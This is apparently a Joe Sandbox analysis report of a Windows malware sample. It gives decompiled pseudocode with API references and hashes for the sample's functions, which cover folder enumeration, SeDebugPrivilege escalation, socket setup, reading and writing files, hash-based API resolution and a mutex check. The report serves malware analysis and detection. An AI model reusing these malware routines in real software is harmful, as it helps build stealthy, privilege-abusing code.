FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
